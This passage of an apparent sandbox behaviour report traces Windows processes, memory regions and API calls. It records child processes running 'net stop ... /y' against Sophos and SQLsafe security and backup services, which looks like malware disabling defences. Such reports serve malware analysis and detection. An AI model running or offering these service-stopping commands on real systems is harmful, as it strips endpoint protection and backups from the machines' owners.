0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4312 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4313 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4314 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4315 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4316 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4317 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4318 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4319 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4320 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4321 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4322 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4323 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4324 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4325 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4326 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 414 os_tid = 0xc24 [0084.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa50 | out: lpSystemTimeAsFileTime=0x26fa50*(dwLowDateTime=0xe73ed050, dwHighDateTime=0x1d48689)) [0084.011] GetCurrentProcessId () returned 0xd30 [0084.011] GetCurrentThreadId () returned 0xc24 [0084.011] GetTickCount () returned 0x1ee15 [0084.011] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa58 | out: lpPerformanceCount=0x26fa58*=1813092900000) returned 1 [0084.012] GetModuleHandleW (lpModuleName=0x0) returned 0xffc40000 [0084.012] __set_app_type (_Type=0x1) [0084.012] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc59c9c) returned 0x0 [0084.012] __getmainargs (in: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788, _DoWildCard=0, _StartInfo=0xffc6479c | out: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788) returned 0 [0084.013] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.013] GetConsoleOutputCP () returned 0x1b5 [0084.013] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffc6cec0 | out: lpCPInfo=0xffc6cec0) returned 1 [0084.013] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0084.015] sprintf_s (in: _DstBuf=0x26f9f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0084.015] setlocale (category=0, locale=".437") returned="English_United States.437" [0084.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0084.016] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0084.016] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Message Router\" /y" [0084.016] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f790, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0084.016] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0084.016] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26f9e8 | out: Buffer=0x26f9e8*=0x42c0f0) returned 0x0 [0084.016] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26f9e8 | out: Buffer=0x26f9e8*=0x42c110) returned 0x0 [0084.016] _fileno (_File=0x7fefdba2a80) returned 0 [0084.016] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0084.017] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0084.017] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0084.017] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.017] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0084.017] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0084.017] _wcsicmp (_String1="file", _String2="stop") returned -13 [0084.017] _wcsicmp (_String1="files", _String2="stop") returned -13 [0084.017] _wcsicmp (_String1="group", _String2="stop") returned -12 [0084.017] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0084.017] _wcsicmp (_String1="help", _String2="stop") returned -11 [0084.017] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0084.017] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0084.017] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0084.017] _wcsicmp (_String1="session", _String2="stop") returned -15 [0084.017] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0084.017] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0084.017] _wcsicmp (_String1="share", _String2="stop") returned -12 [0084.017] _wcsicmp (_String1="start", _String2="stop") returned -14 [0084.017] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0084.017] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0084.017] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0084.017] _wcsicmp (_String1="accounts", _String2="Sophos Message Router") returned -18 [0084.017] _wcsicmp (_String1="computer", _String2="Sophos Message Router") returned -16 [0084.017] _wcsicmp (_String1="config", _String2="Sophos Message Router") returned -16 [0084.017] _wcsicmp (_String1="continue", _String2="Sophos Message Router") returned -16 [0084.017] _wcsicmp (_String1="cont", _String2="Sophos Message Router") returned -16 [0084.017] _wcsicmp (_String1="file", _String2="Sophos Message Router") returned -13 [0084.017] _wcsicmp (_String1="files", _String2="Sophos Message Router") returned -13 [0084.017] _wcsicmp (_String1="group", _String2="Sophos Message Router") returned -12 [0084.017] _wcsicmp (_String1="groups", _String2="Sophos Message Router") returned -12 [0084.017] _wcsicmp (_String1="help", _String2="Sophos Message Router") returned -11 [0084.017] _wcsicmp (_String1="helpmsg", _String2="Sophos Message Router") returned -11 [0084.017] _wcsicmp (_String1="localgroup", _String2="Sophos Message Router") returned -7 [0084.017] _wcsicmp (_String1="pause", _String2="Sophos Message Router") returned -3 [0084.017] _wcsicmp (_String1="session", _String2="Sophos Message Router") returned -10 [0084.017] _wcsicmp (_String1="sessions", _String2="Sophos Message Router") returned -10 [0084.017] _wcsicmp (_String1="sess", _String2="Sophos Message Router") returned -10 [0084.018] _wcsicmp (_String1="share", _String2="Sophos Message Router") returned -7 [0084.018] _wcsicmp (_String1="start", _String2="Sophos Message Router") returned 5 [0084.018] _wcsicmp (_String1="stats", _String2="Sophos Message Router") returned 5 [0084.018] _wcsicmp (_String1="statistics", _String2="Sophos Message Router") returned 5 [0084.018] _wcsicmp (_String1="stop", _String2="Sophos Message Router") returned 5 [0084.018] _wcsicmp (_String1="time", _String2="Sophos Message Router") returned 1 [0084.018] _wcsicmp (_String1="user", _String2="Sophos Message Router") returned 2 [0084.018] _wcsicmp (_String1="users", _String2="Sophos Message Router") returned 2 [0084.018] _wcsicmp (_String1="msg", _String2="Sophos Message Router") returned -6 [0084.018] _wcsicmp (_String1="messenger", _String2="Sophos Message Router") returned -6 [0084.018] _wcsicmp (_String1="receiver", _String2="Sophos Message Router") returned -1 [0084.018] _wcsicmp (_String1="rcv", _String2="Sophos Message Router") returned -1 [0084.018] _wcsicmp (_String1="netpopup", _String2="Sophos Message Router") returned -5 [0084.018] _wcsicmp (_String1="redirector", _String2="Sophos Message Router") returned -1 [0084.018] _wcsicmp (_String1="redir", _String2="Sophos Message Router") returned -1 [0084.018] _wcsicmp (_String1="rdr", _String2="Sophos Message Router") returned -1 [0084.018] _wcsicmp (_String1="workstation", _String2="Sophos Message Router") returned 4 [0084.018] _wcsicmp (_String1="work", _String2="Sophos Message Router") returned 4 [0084.018] _wcsicmp (_String1="wksta", _String2="Sophos Message Router") returned 4 [0084.018] _wcsicmp (_String1="prdr", _String2="Sophos Message Router") returned -3 [0084.018] _wcsicmp (_String1="devrdr", _String2="Sophos Message Router") returned -15 [0084.018] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos Message Router") returned -7 [0084.018] _wcsicmp (_String1="server", _String2="Sophos Message Router") returned -10 [0084.018] _wcsicmp (_String1="svr", _String2="Sophos Message Router") returned 7 [0084.018] _wcsicmp (_String1="srv", _String2="Sophos Message Router") returned 3 [0084.018] _wcsicmp (_String1="lanmanserver", _String2="Sophos Message Router") returned -7 [0084.018] _wcsicmp (_String1="alerter", _String2="Sophos Message Router") returned -18 [0084.018] _wcsicmp (_String1="netlogon", _String2="Sophos Message Router") returned -5 [0084.018] _wcsupr (in: _String="Sophos Message Router" | out: _String="SOPHOS MESSAGE ROUTER") returned="SOPHOS MESSAGE ROUTER" [0084.018] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x42ce20 [0084.022] GetServiceKeyNameW (in: hSCManager=0x42ce20, lpDisplayName="SOPHOS MESSAGE ROUTER", lpServiceName=0xffc65750, lpcchBuffer=0x26f908 | out: lpServiceName="", lpcchBuffer=0x26f908) returned 0 [0084.023] _wcsicmp (_String1="msg", _String2="SOPHOS MESSAGE ROUTER") returned -6 [0084.023] _wcsicmp (_String1="messenger", _String2="SOPHOS MESSAGE ROUTER") returned -6 [0084.023] _wcsicmp (_String1="receiver", _String2="SOPHOS MESSAGE ROUTER") returned -1 [0084.023] _wcsicmp (_String1="rcv", _String2="SOPHOS MESSAGE ROUTER") returned -1 [0084.023] _wcsicmp (_String1="redirector", _String2="SOPHOS MESSAGE ROUTER") returned -1 [0084.023] _wcsicmp (_String1="redir", _String2="SOPHOS MESSAGE ROUTER") returned -1 [0084.023] _wcsicmp (_String1="rdr", _String2="SOPHOS MESSAGE ROUTER") returned -1 [0084.023] _wcsicmp (_String1="workstation", _String2="SOPHOS MESSAGE ROUTER") returned 4 [0084.023] _wcsicmp (_String1="work", _String2="SOPHOS MESSAGE ROUTER") returned 4 [0084.023] _wcsicmp (_String1="wksta", _String2="SOPHOS MESSAGE ROUTER") returned 4 [0084.023] _wcsicmp (_String1="prdr", _String2="SOPHOS MESSAGE ROUTER") returned -3 [0084.023] _wcsicmp (_String1="devrdr", _String2="SOPHOS MESSAGE ROUTER") returned -15 [0084.023] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS MESSAGE ROUTER") returned -7 [0084.023] _wcsicmp (_String1="server", _String2="SOPHOS MESSAGE ROUTER") returned -10 [0084.023] _wcsicmp (_String1="svr", _String2="SOPHOS MESSAGE ROUTER") returned 7 [0084.023] _wcsicmp (_String1="srv", _String2="SOPHOS MESSAGE ROUTER") returned 3 [0084.023] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS MESSAGE ROUTER") returned -7 [0084.023] _wcsicmp (_String1="alerter", _String2="SOPHOS MESSAGE ROUTER") returned -18 [0084.023] _wcsicmp (_String1="netlogon", _String2="SOPHOS MESSAGE ROUTER") returned -5 [0084.023] NetServiceControl (in: servername=0x0, service="SOPHOS MESSAGE ROUTER", opcode=0x0, arg=0x0, bufptr=0x26f910 | out: bufptr=0x26f910) returned 0x889 [0084.024] wcscpy_s (in: _Destination=0xffc680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0084.024] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0084.025] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0084.026] GetFileType (hFile=0xb) returned 0x2 [0084.120] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7d8 | out: lpMode=0x26f7d8) returned 1 [0084.120] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f7d0, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0x26f7d0*=0x1e) returned 1 [0084.121] GetFileType (hFile=0xb) returned 0x2 [0084.121] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7d8 | out: lpMode=0x26f7d8) returned 1 [0084.121] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f7d0, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0x26f7d0*=0x2) returned 1 [0084.121] _ultow (in: _Dest=0x889, _Radix=2553920 | out: _Dest=0x889) returned="2185" [0084.121] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0084.122] GetFileType (hFile=0xb) returned 0x2 [0084.122] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7d8 | out: lpMode=0x26f7d8) returned 1 [0084.122] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f7d0, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0x26f7d0*=0x34) returned 1 [0084.122] GetFileType (hFile=0xb) returned 0x2 [0084.122] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7d8 | out: lpMode=0x26f7d8) returned 1 [0084.123] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f7d0, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0x26f7d0*=0x2) returned 1 [0084.123] NetApiBufferFree (Buffer=0x42c0f0) returned 0x0 [0084.123] NetApiBufferFree (Buffer=0x42c110) returned 0x0 [0084.123] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Message Router\" /y" [0084.123] exit (_Code=2) Process: id = "73" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x22d58000" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"SQLsafe Backup Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4327 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4328 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4329 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4330 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4331 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4332 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4333 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4334 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4335 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4336 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4337 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4338 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4339 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4340 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4341 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 415 os_tid = 0xec0 Process: id = "74" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x22578000" os_pid = "0xcb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"SQLsafe Filter Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4363 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4364 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4365 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4366 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4367 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4368 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4369 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4370 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4371 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4372 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4373 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4374 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4375 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4376 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4377 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 417 os_tid = 0xfd4 Process: id = "75" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x21a63000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "65" os_parent_pid = "0xfdc" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos Safestore Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4378 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4379 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4380 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4381 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4382 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4383 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4384 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4385 start_va = 0xfffd0000 end_va = 0x100002fff entry_point = 0xfffd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4386 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4387 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4388 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4389 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4390 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4391 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4392 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4393 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4394 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4395 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4396 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4397 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4398 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4399 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4400 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4401 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4402 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4403 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4404 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4405 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 